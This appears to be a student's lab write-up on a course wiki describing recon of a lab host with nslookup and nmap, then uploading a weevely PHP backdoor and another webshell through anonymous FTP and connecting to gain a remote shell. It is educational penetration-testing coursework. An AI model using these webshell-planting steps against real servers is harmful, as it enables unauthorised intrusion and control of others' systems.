Lab 8.1 Weevely - Paiet/SEC-335 GitHub Wiki

Somewhat Passive Recon

nslookup pippin.shire.local 10.0.5.22

Active Recon

sudo nmap -f 10.0.5.25 and sudo nmap -sV 10.0.5.25

Found an FTP server open on port 21

Found SSH open on port 22

Found a webserver running and open on port 80

Remote Code Execution

Generated a new agent to be uploaded to the FTP/21 server, using weevely generate 123 502.php (123 being the password and 502.php being the file to be uploaded)

Accessed the FTP server on port 21 with ftp 10.0.5.25 > user anonymous > and no passed

cd to the upload directory and uploaded 501.php (webshell) and 502.php (weevely) using put

I then ran weevely 10.0.5.25/upload/502.php 123, which created/established a shell on pippin

Reflections

I feel once I started going, it was pretty straight for as labs go.